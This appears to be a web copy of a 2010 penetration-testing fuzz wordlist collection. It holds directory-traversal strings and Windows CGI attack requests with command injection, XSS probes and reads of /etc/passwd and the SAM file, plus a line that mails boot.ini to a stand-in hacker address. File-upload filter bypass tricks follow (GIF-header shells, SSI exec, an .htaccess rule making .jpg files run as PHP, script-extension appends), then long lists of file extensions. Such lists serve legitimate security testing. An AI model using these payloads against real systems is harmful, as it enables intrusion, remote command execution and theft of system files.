AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}<br />
.../{FILE}<br />
.../.../{FILE}<br />
.../.../.../{FILE}<br />
.../.../.../.../{FILE}<br />
.../.../.../.../.../{FILE}<br />
.../.../.../.../.../.../{FILE}<br />
.../.../.../.../.../.../.../{FILE}<br />
.../.../.../.../.../.../.../.../{FILE}<br />
...\{FILE}<br />
...\...\{FILE}<br />
...\...\...\{FILE}<br />
...\...\...\...\{FILE}<br />
...\...\...\...\...\{FILE}<br />
...\...\...\...\...\...\{FILE}<br />
...\...\...\...\...\...\...\{FILE}<br />
...\...\...\...\...\...\...\...\{FILE}<br />
..../{FILE}<br />
..../..../{FILE}<br />
..../..../..../{FILE}<br />
..../..../..../..../{FILE}<br />
..../..../..../..../..../{FILE}<br />
..../..../..../..../..../..../{FILE}<br />
..../..../..../..../..../..../..../{FILE}<br />
..../..../..../..../..../..../..../..../{FILE}<br />
....\{FILE}<br />
....\....\{FILE}<br />
....\....\....\{FILE}<br />
....\....\....\....\{FILE}<br />
....\....\....\....\....\{FILE}<br />
....\....\....\....\....\....\{FILE}<br />
....\....\....\....\....\....\....\{FILE}<br />
....\....\....\....\....\....\....\....\{FILE}<br />
........................................................................../{FILE}<br />
........................................................................../../{FILE}<br />
........................................................................../../../{FILE}<br />
........................................................................../../../../{FILE}<br />
........................................................................../../../../../{FILE}<br />
........................................................................../../../../../../{FILE}<br />
........................................................................../../../../../../../{FILE}<br />
........................................................................../../../../../../../../{FILE}<br />
..........................................................................\{FILE}<br />
..........................................................................\..\{FILE}<br />
..........................................................................\..\..\{FILE}<br />
..........................................................................\..\..\..\{FILE}<br />
..........................................................................\..\..\..\..\{FILE}<br />
..........................................................................\..\..\..\..\..\{FILE}<br />
..........................................................................\..\..\..\..\..\..\{FILE}<br />
</pre><br />
<br />
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76) ===<br />
<pre># Common Windows CGI (Update: 17 March 2010)<br />
# fuzz inside executable directories<br />
# on windows, this is usually /scripts or /cgi-bin<br />
# adam.muntner@quietmove.com<br />
<br />
cart32.exe<br />
get32.exe<br />
visadmin.exe<br />
foxweb.exe<br />
webplus.exe?about<br />
fpsrvadm.exe<br />
MsmMask.exe<br />
cmd.exe?/c+dir<br />
cmd1.exe?/c+dir<br />
post32.exe|dir%20c:\\<br />
cgitest.exe<br />
hpnst.exe?c=p+i=<br />
Pbcgi.exe<br />
testcgi.exe<br />
webfind.exe?keywords=01234567890123456789<br />
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C<br />
test-cgi.exe?<script>alert(document.cookie)</script><br />
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['<br />
mkilog.exe<br />
mkplog.exe<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
perl.exe?-v<br />
perl.exe<br />
ppdscgi.exe<br />
c32web.exe/ChangeAdminPassword<br />
windmail.exe<br />
dbmlparser.exe<br />
cgimail.exe<br />
minimal.exe<br />
rguest.exe<br />
visitor.exe<br />
webbbs.exe<br />
wguest.exe<br />
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15<br />
cfgwiz.exe<br />
Cgitest.exe<br />
mailform.exe<br />
post16.exe<br />
imagemap.exe<br />
htimage.exe/path/filename?2,2<br />
htimage.exe<br />
Webnews.exe<br />
texis.exe/junk<br />
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/<br />
sensepost.exe?/c+dir<br />
testcgi.exe<br />
testcgi.exe?<script>alert(document.cookie)</script><br />
ion-p.exe?page=c:\winnt\repair\sam<br />
../../../../../../../../../../WINNT/system32/ipconfig.exe<br />
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf <br />
foxweb.dll<br />
wconsole.dll<br />
shtml.dll<br />
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]<br />
rightfax/fuwww.dll/?<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\<br />
GW5/GWWEB.EXE<br />
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA<br />
GW5/GWWEB.EXE?HELP=bad-request<br />
GWWEB.EXE?HELP=bad-request<br />
echo.bat<br />
echo.bat?&dir+c:\\<br />
hello.bat?&dir+c:\\<br />
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
input2.bat?|dir<br />
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
test-cgi.bat<br />
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,<br />
</pre><br />
<br />
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===<br />
<pre># File Upload Fuzzfile - File Name Filter Bypass<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
# For MIME filter bypass, your shellscript should look like<br />
# -------<br />
# GIF89aP;<br />
# [shell]<br />
# -------<br />
#<br />
# For mod_cgi Server Side Include upload attacks<br />
#<br />
#<!--#exec cmd="ls" --><br />
#<br />
#or, on Windows<br />
#<br />
#<!--#exec cmd="dir" --><br />
#<br />
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd; try setting .jpg to executable. If you can set the target directory, try fuzzing the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.<br />
#<br />
# example .htaccess that sets mime type .jpg to be executable:<br />
# -----<br />
# AddType application/x-httpd-php .jpg<br />
# -----<br />
</pre><br />
<br />
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2) ===<br />
<pre># Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2010)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) ===<br />
<pre># PHP-Specific File Upload Filter Bypass Appends (Update: 17 March 2010 - notes)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# also: use "gim" to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar<br />
{PHPSCRIPT}.php.doc<br />
{PHPSCRIPT}.php.xls<br />
{PHPSCRIPT}.php.xlsx<br />
{PHPSCRIPT}.php.pdf<br />
{PHPSCRIPT}.php.jpeg<br />
{PHPSCRIPT}.php.gif<br />
{PHPSCRIPT}.php.zip<br />
</pre><br />
<br />
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14) ===<br />
<pre># Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2009)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{ASPSCRIPT}<br />
{ASPSCRIPT};<br />
{ASPSCRIPT};.jpg<br />
{ASPSCRIPT};.pdf<br />
{ASPSCRIPT};.html<br />
{ASPSCRIPT};.htm<br />
{ASPSCRIPT};.txt<br />
{ASPSCRIPT};.xyz<br />
{ASPSCRIPT};.zip<br />
{ASPSCRIPT};.tgz<br />
{ASPSCRIPT};.doc<br />
{ASPSCRIPT};.docx<br />
{ASPSCRIPT};.xls<br />
{ASPSCRIPT};.xlsx<br />
</pre><br />
<br />
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9) ===<br />
<pre>#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010) <br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
{HOST}/templates_compiled/<br />
{HOST}/templates_c/<br />
{HOST}/templates/<br />
{HOST}/temporary/<br />
{HOST}/images/<br />
{HOST}/cache/<br />
{HOST}/temp/<br />
{HOST}/files/<br />
{HOST}/tmp/<br />
</pre><br />
<br />
=== Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863) ===<br />
<pre><br />
#Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
<pre><br />
.$er<br />
.123<br />
.1pe<br />
.1ph<br />
.3dr<br />
.3dt<br />
.3me<br />
.3pe<br />
.4dl<br />
.4dv<br />
.8xk<br />
.^^^<br />
.a3l<br />
.a3m<br />
.a3w<br />
.a4l<br />
.a4m<br />
.a4w<br />
.a5l<br />
.a5w<br />
.a65<br />
.aao<br />
.ab<br />
.ab1<br />
.ab2<br />
.ab3<br />
.abcd<br />
.abi<br />
.abp<br />
.aby<br />
.aca<br />
.acc<br />
.accdb<br />
.acf<br />
.acg<br />
.ade<br />
.adp<br />
.adt<br />
.adx<br />
.aft<br />
.agd<br />
.aifb<br />
.alc<br />
.ald<br />
.ali<br />
.amb<br />
.amsorm<br />
.an1<br />
.anme<br />
.apr<br />
.arc<br />
.arh<br />
.ask<br />
.asm<br />
.ast<br />
.at5<br />
.att<br />
.aw<br />
.awg<br />
.azw<br />
.bafl<br />
.bci<br />
.bcm<br />
.bdf<br />
.bdic<br />
.bfx<br />
.bgl<br />
.bgt<br />
.bin<br />
.bjo<br />
.bk<br />
.bkk<br />
.blb<br />
.bld<br />
.blg<br />
.bok<br />
.box<br />
.brd<br />
.brw<br />
.btf<br />
.btif<br />
.btm<br />
.btr<br />
.cap<br />
.cat<br />
.cbg<br />
.cch<br />
.ccr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.cdx<br />
.cel<br />
.celtx<br />
.chg<br />
.chk<br />
.chn<br />
.ckd<br />
.ckt<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.clp<br />
.cmbl<br />
.cna<br />
.contact<br />
.cpi<br />
.cpmz<br />
.crd<br />
.crtx<br />
.csa<br />
.csv<br />
.ctf<br />
.ctt<br />
.cursorfx<br />
.curxptheme<br />
.cvd<br />
.cvn<br />
.cwk<br />
.cws<br />
.cwz<br />
.cxt<br />
.cyo<br />
.cys<br />
.daf<br />
.dal<br />
.dam<br />
.das<br />
.dat<br />
.data<br />
.db<br />
.db2<br />
.db3<br />
.dbc<br />
.dbd<br />
.dbf<br />
.dbx<br />
.dcf<br />
.dcl<br />
.dcm<br />
.dcmd<br />
.ddc<br />
.ddcx<br />
.ddt<br />
.dem<br />
.des<br />
.dex<br />
.dfm<br />
.dfproj<br />
.dft<br />
.dgb<br />
.dif<br />
.dii<br />
.dlg<br />
.dm2<br />
.dmo<br />
.dmsk<br />
.dnc<br />
.dockzip<br />
.dp1<br />
.dpn<br />
.dpx<br />
.drl<br />
.dsb<br />
.dsd<br />
.dsk<br />
.dsy<br />
.dsz<br />
.dt0<br />
.dt1<br />
.dt2<br />
.dta<br />
.dtr<br />
.dvdproj<br />
.dvo<br />
.dwi<br />
.e00<br />
.eap<br />
.ebuild<br />
.ec0<br />
.eco<br />
.ecx<br />
.edb<br />
.edf<br />
.eep<br />
.efx<br />
.egp<br />
.emb<br />
.emd<br />
.emlxpart<br />
.enc<br />
.enw<br />
.epp<br />
.epub<br />
.epw<br />
.er1<br />
.esp<br />
.ess<br />
.est<br />
.esx<br />
.et<br />
.eta<br />
.etd<br />
.etl<br />
.ev<br />
.ev3<br />
.evt<br />
.evy<br />
.exif<br />
.exp<br />
.exx<br />
.fa<br />
.fasta<br />
.fbl<br />
.fcd<br />
.fcs<br />
.fdb<br />
.ffd<br />
.ffwp<br />
.fhc<br />
.fid<br />
.fil<br />
.flame<br />
.fll<br />
.flo<br />
.flp<br />
.flt<br />
.fm<br />
.fm5<br />
.fmp<br />
.fo<br />
.fob<br />
.fol<br />
.fop<br />
.fox<br />
.fp<br />
.fp3<br />
.fp4<br />
.fp5<br />
.fp7<br />
.frl<br />
.frm<br />
.fro<br />
.frx<br />
.fsb<br />
.fsc<br />
.ftm<br />
.ftw<br />
.gan<br />
.gbr<br />
.gc<br />
.gcx<br />
.gdb<br />
.ged<br />
.gedcom<br />
.gen<br />
.ggb<br />
.gml<br />
.gms<br />
.gno<br />
.gnp<br />
.gp3<br />
.gpi<br />
.gps<br />
.gpx<br />
.gra<br />
.grade<br />
.grf<br />
.grib<br />
.grk<br />
.grr<br />
.grv<br />
.gs<br />
.gst<br />
.gtp<br />
.gwk<br />
.gxl<br />
.hcc<br />
.hce<br />
.hci<br />
.hcp<br />
.hcr<br />
.hcu<br />
.hda<br />
.hdb<br />
.hdf<br />
.hdi<br />
.hdl<br />
.hif<br />
.hl<br />
.hml<br />
.hmt<br />
.hs2<br />
.hsk<br />
.hst<br />
.htg<br />
.huh<br />
.hyv<br />
.i5z<br />
.ib<br />
.ics<br />
.id2<br />
.idx<br />
.igc<br />
.ihx<br />
.ii<br />
.iif<br />
.img<br />
.imt<br />
.ink<br />
.inp<br />
.ins<br />
.ip<br />
.irock<br />
.irr<br />
.irx<br />
.isf<br />
.itdb<br />
.itl<br />
.itm<br />
.itn<br />
.itw<br />
.itx<br />
.ivt<br />
.iw<br />
.ixb<br />
.jasper<br />
.jdb<br />
.jef<br />
.jmp<br />
.jnt<br />
.job<br />
.joboptions<br />
.joined<br />
.jph<br />
.jrprint<br />
.jrxml<br />
.jude<br />
.kap<br />
.kdb<br />
.kid<br />
.kismac<br />
.kmz<br />
.kpf<br />
.kpp<br />
.kpr<br />
.kpx<br />
.kpz<br />
.l<br />
.l6t<br />
.laccdb<br />
.lbl<br />
.lbx<br />
.lcd<br />
.lcf<br />
.lcm<br />
.ldif<br />
.lex<br />
.lgc<br />
.lgf<br />
.lgh<br />
.lgi<br />
.lgl<br />
.lib<br />
.lif<br />
.livereg<br />
.liveupdate<br />
.lix<br />
.llb<br />
.lms<br />
.lmx<br />
.lnt<br />
.loc<br />
.lp7<br />
.lrf<br />
.lrs<br />
.lrx<br />
.lsf<br />
.lsl<br />
.lsp<br />
.lsr<br />
.lst<br />
.lsu<br />
.lvm<br />
.lw4<br />
.ly<br />
.m<br />
.mag<br />
.mai<br />
.map<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mbf<br />
.mbg<br />
.mbl<br />
.mbp<br />
.mbx<br />
.mc1<br />
.mc9<br />
.mcd<br />
.md<br />
.mdb<br />
.mdc<br />
.mdf<br />
.mdl<br />
.mdm<br />
.mdn<br />
.mdt<br />
.mdx<br />
.mdz<br />
.mem<br />
.menc<br />
.met<br />
.mex<br />
.mfo<br />
.mfp<br />
.mgc<br />
.mls<br />
.mm<br />
.mmap<br />
.mmc<br />
.mmf<br />
.mmp<br />
.mnc<br />
.mng<br />
.mnk<br />
.mno<br />
.mny<br />
.mobi<br />
.moho<br />
.mosaic<br />
.mox<br />
.mpd<br />
.mpj<br />
.mpp<br />
.mpt<br />
.mpx<br />
.mpz<br />
.mq4<br />
.ms10<br />
.mth<br />
.mtw<br />
.mud<br />
.muf<br />
.mw<br />
.mwf<br />
.mws<br />
.mwx<br />
.mxd<br />
.myd<br />
.myi<br />
.nb<br />
.nc<br />
.ndf<br />
.ndk<br />
.ndx<br />
.net<br />
.neta<br />
.nfo<br />
.nitf<br />
.nmind<br />
.not<br />
.notebook<br />
.np<br />
.npl<br />
.npt<br />
.nrl<br />
.ns2<br />
.ns3<br />
.ns4<br />
.nsf<br />
.ntx<br />
.numbers<br />
.nvl<br />
.nyf<br />
.oab<br />
.obj<br />
.odb<br />
.odf<br />
.odp<br />
.ods<br />
.odx<br />
.oeaccount<br />
.ofc<br />
.ofm<br />
.oft<br />
.ofx<br />
.omcs<br />
.omp<br />
.ond<br />
.one<br />
.oo3<br />
.opf<br />
.opx<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.or6<br />
.org<br />
.orx<br />
.otf<br />
.otl<br />
.otln<br />
.ots<br />
.out<br />
.ov2<br />
.ova<br />
.ovf<br />
.p96<br />
.p97<br />
.pab<br />
.paf<br />
.pan<br />
.pbd<br />
.pc<br />
.pcap<br />
.pcb<br />
.pcr<br />
.pd4<br />
.pd5<br />
.pdas<br />
.pdb<br />
.pdd<br />
.pdm<br />
.pds<br />
.pdx<br />
.peb<br />
.pec<br />
.pep<br />
.pex<br />
.pfc<br />
.pfl<br />
.phb<br />
.phm<br />
.pi<br />
.pis<br />
.pjx<br />
.pka<br />
.pkb<br />
.pkh<br />
.pks<br />
.pkt<br />
.pln<br />
.plw<br />
.pmo<br />
.pmr<br />
.pnproj<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pod<br />
.poi<br />
.pos<br />
.postal<br />
.pot<br />
.potm<br />
.potx<br />
.pp2<br />
.ppf<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.prc<br />
.pre<br />
.prf<br />
.prj<br />
.prm<br />
.prs<br />
.psa<br />
.psf<br />
.psm<br />
.pst<br />
.ptb<br />
.ptf<br />
.ptk<br />
.ptm<br />
.ptn<br />
.ptt<br />
.ptz<br />
.pvl<br />
.pwd<br />
.pxj<br />
.pxl<br />
.q07<br />
.q08<br />
.q09<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qdfm<br />
.qel<br />
.qfx<br />
.qif<br />
.qpb<br />
.qpf<br />
.qph<br />
.qpm<br />
.qpw<br />
.qrp<br />
.qsd<br />
.ral<br />
.rbt<br />
.rcd<br />
.rcg<br />
.rdb<br />
.rdf<br />
.rdx<br />
.ref<br />
.ret<br />
.rf1<br />
.rfa<br />
.rfo<br />
.rge<br />
.rgn<br />
.rgo<br />
.rmuf<br />
.rnq<br />
.rod<br />
.rog<br />
.roi<br />
.rou<br />
.rpp<br />
.rpt<br />
.rrt<br />
.rsc<br />
.rsd<br />
.rsw<br />
.rte<br />
.rvt<br />
.rwg<br />
.rzb<br />
.s85<br />
.saf<br />
.sam07<br />
.sar<br />
.sav<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sca<br />
.scf<br />
.sch<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sdp<br />
.sdq<br />
.sds<br />
.sen<br />
.seo<br />
.seq<br />
.ser<br />
.sgml<br />
.sgn<br />
.shp<br />
.shs<br />
.shx<br />
.skc<br />
.skv<br />
.skx<br />
.sle<br />
.slk<br />
.slp<br />
.snapfireshow<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sps<br />
.spub<br />
.spv<br />
.sq<br />
.sqd<br />
.sql<br />
.sqlite<br />
.sqr<br />
.sta<br />
.stc<br />
.stf<br />
.stk<br />
.stl<br />
.stm<br />
.stp<br />
.str<br />
.stt<br />
.stw<br />
.styk<br />
.stykz<br />
.swk<br />
.sxc<br />
.sxi<br />
.sy3<br />
.t01<br />
.t02<br />
.t03<br />
.t04<br />
.t05<br />
.t06<br />
.t07<br />
.t08<br />
.t09<br />
.t2<br />
.t3001<br />
.tax2008<br />
.tax2009<br />
.tb<br />
.tbk<br />
.tbl<br />
.tcc<br />
.tcx<br />
.tda<br />
.tdl<br />
.tdm<br />
.tdt<br />
.te<br />
.te3<br />
.teacher<br />
.tef<br />
.tet<br />
.tfa<br />
.tfd<br />
.tfrd<br />
.tjp<br />
.tk3<br />
.tkfl<br />
.tmw<br />
.tol<br />
.topc<br />
.tpb<br />
.tps<br />
.tr3<br />
.tra<br />
.trd<br />
.trk<br />
.trs<br />
.trx<br />
.tst<br />
.tsv<br />
.ttk<br />
.txa<br />
.txd<br />
.txf<br />
.uccapilog<br />
.ud<br />
.udb<br />
.udeb<br />
.uds<br />
.ulf<br />
.ulz<br />
.update<br />
.upoi<br />
.usr<br />
.uvf<br />
.uwl<br />
.val<br />
.vbpf1<br />
.vcd<br />
.vce<br />
.vcf<br />
.vcs<br />
.vdb<br />
.vdx<br />
.vfs<br />
.vi<br />
.vip<br />
.vle<br />
.vlg<br />
.vmt<br />
.voi<br />
.vok<br />
.vrd<br />
.vscontent<br />
.vsx<br />
.vtx<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb2<br />
.wb3<br />
.wdb<br />
.wdq<br />
.wea<br />
.wfd<br />
.wfm<br />
.wgp<br />
.wgt<br />
.windowslivecontact<br />
.wjr<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wki<br />
.wks<br />
.wku<br />
.wlmp<br />
.wmdb<br />
.wor<br />
.wpc<br />
.wpf<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtb<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xdp<br />
.xds<br />
.xef<br />
.xem<br />
.xfd<br />
.xfo<br />
.xft<br />
.xl<br />
.xlc<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsb<br />
.xlsm<br />
.xlsx<br />
.xlt<br />
.xltm<br />
.xltx<br />
.xlw<br />
.xmcd<br />
.xml<br />
.xmlper<br />
.xmpz<br />
.xpg<br />
.xpj<br />
.xpm<br />
.xpt<br />
.xrp<br />
.xsl<br />
.xslt<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.yam<br />
.zap<br />
.zdb<br />
.zdc<br />
.zix<br />
.zmc<br />
.zpl<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===<br />
<pre><br />
# Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.0<br />
.000<br />
.7z<br />
.a00<br />
.a01<br />
.a02<br />
.ace<br />
.ain<br />
.alz<br />
.apz<br />
.ar<br />
.arc<br />
.arh<br />
.ari<br />
.arj<br />
.ark<br />
.axx<br />
.b64<br />
.ba<br />
.bh<br />
.boo<br />
.bz<br />
.bz2<br />
.bzip<br />
.bzip2<br />
.c00<br />
.c01<br />
.c02<br />
.car<br />
.cb7<br />
.cbr<br />
.cbt<br />
.cbz<br />
.cp9<br />
.cpgz<br />
.cpt<br />
.dar<br />
.dd<br />
.deb<br />
.dgc<br />
.dist<br />
.ecs<br />
.efw<br />
.epi<br />
.f<br />
.fdp<br />
.gca<br />
.gz<br />
.gzi<br />
.gzip<br />
.ha<br />
.hbc<br />
.hbc2<br />
.hbe<br />
.hki<br />
.hki1<br />
.hki2<br />
.hki3<br />
.hpk<br />
.hyp<br />
.ice<br />
.ipg<br />
.ipk<br />
.ish<br />
.j<br />
.jar.pack<br />
.jgz<br />
.jic<br />
.kgb<br />
.lbr<br />
.lemon<br />
.lha<br />
.lnx<br />
.lqr<br />
.lz<br />
.lzh<br />
.lzm<br />
.lzma<br />
.lzo<br />
.lzx<br />
.md<br />
.mint<br />
.mou<br />
.mpkg<br />
.mzp<br />
.oar<br />
.p7m<br />
.pack.gz<br />
.package<br />
.pae<br />
.pak<br />
.paq6<br />
.paq7<br />
.paq8<br />
.par<br />
.par2<br />
.pbi<br />
.pcv<br />
.pea<br />
.pet<br />
.pf<br />
.pim<br />
.pit<br />
.piz<br />
.pkg<br />
.pup<br />
.puz<br />
.pwa<br />
.qda<br />
.r0<br />
.r00<br />
.r01<br />
.r02<br />
.r03<br />
.r1<br />
.r2<br />
.r30<br />
.rar<br />
.rev<br />
.rk<br />
.rnc<br />
.rp9<br />
.rpm<br />
.rte<br />
.rz<br />
.rzs<br />
.s00<br />
.s01<br />
.s02<br />
.s7z<br />
.sar<br />
.sdc<br />
.sdn<br />
.sea<br />
.sen<br />
.sfs<br />
.sfx<br />
.sh<br />
.shar<br />
.shk<br />
.shr<br />
.sit<br />
.sitx<br />
.spt<br />
.sqx<br />
.sqz<br />
.tar<br />
.tar.gz<br />
.tar.xz<br />
.taz<br />
.tbz<br />
.tbz2<br />
.tg<br />
.tgz<br />
.tlz<br />
.tlzma<br />
.txz<br />
.tz<br />
.uc2<br />
.uha<br />
.vem<br />
.vsi<br />
.wad<br />
.war<br />
.wot<br />
.xef<br />
.xez<br />
.xmcdz<br />
.xpi<br />
.xx<br />
.xz<br />
.y<br />
.yz<br />
.z<br />
.z01<br />
.z02<br />
.z03<br />
.z04<br />
.zap<br />
.zfsendtotarget<br />
.zip<br />
.zipx<br />
.zix<br />
.zoo<br />
.zpi<br />
.zz</pre><br />
<br />
=== Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) ===<br />
<pre><br />
# Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.3me<br />
.3pe<br />
.4dl<br />
.8xk<br />
.^^^<br />
.aao<br />
.ab2<br />
.aca<br />
.accdb<br />
.acf<br />
.acg<br />
.agd<br />
.an1<br />
.anme<br />
.arc<br />
.arh<br />
.ast<br />
.att<br />
.aw<br />
.bafl<br />
.bdf<br />
.bfx<br />
.bjo<br />
.bld<br />
.blg<br />
.btf<br />
.btif<br />
.btr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.chk<br />
.ckd<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.cmbl<br />
.contact<br />
.cpi<br />
.cpmz<br />
.csv<br />
.cwz<br />
.cxt<br />
.daf<br />
.dat<br />
.data<br />
.db<br />
.dcf<br />
.ddt<br />
.dex<br />
.dif<br />
.dmsk<br />
.dnc<br />
.dpx<br />
.dsd<br />
.dt1<br />
.dt2<br />
.dta<br />
.e00<br />
.ec0<br />
.edf<br />
.eep<br />
.efx<br />
.enc<br />
.enw<br />
.epw<br />
.est<br />
.et<br />
.eta<br />
.ev3<br />
.exif<br />
.exp<br />
.fbl<br />
.fdb<br />
.fid<br />
.fol<br />
.gdb<br />
.gen<br />
.gnp<br />
.gpi<br />
.gpx<br />
.hcp<br />
.hdf<br />
.hmt<br />
.hsk<br />
.htg<br />
.id2<br />
.ii<br />
.img<br />
.ink<br />
.ins<br />
.irr<br />
.irx<br />
.iw<br />
.jdb<br />
.jnt<br />
.job<br />
.jrprint<br />
.kmz<br />
.lbx<br />
.lex<br />
.lgf<br />
.lgl<br />
.lib<br />
.liveupdate<br />
.lnt<br />
.lst<br />
.m<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mdb<br />
.mem<br />
.menc<br />
.met<br />
.mmf<br />
.mng<br />
.mpd<br />
.mpp<br />
.ms10<br />
.muf<br />
.mw<br />
.mwf<br />
.mwx<br />
.nc<br />
.ndx<br />
.nfo<br />
.not<br />
.ns2<br />
.ns3<br />
.ns4<br />
.ntx<br />
.numbers<br />
.ods<br />
.oeaccount<br />
.omcs<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.orx<br />
.out<br />
.ov2<br />
.ovf<br />
.paf<br />
.pbd<br />
.pcr<br />
.pdb<br />
.pdx<br />
.peb<br />
.pec<br />
.pfc<br />
.pis<br />
.pln<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pos<br />
.postal<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.pre<br />
.prf<br />
.psa<br />
.psf<br />
.pst<br />
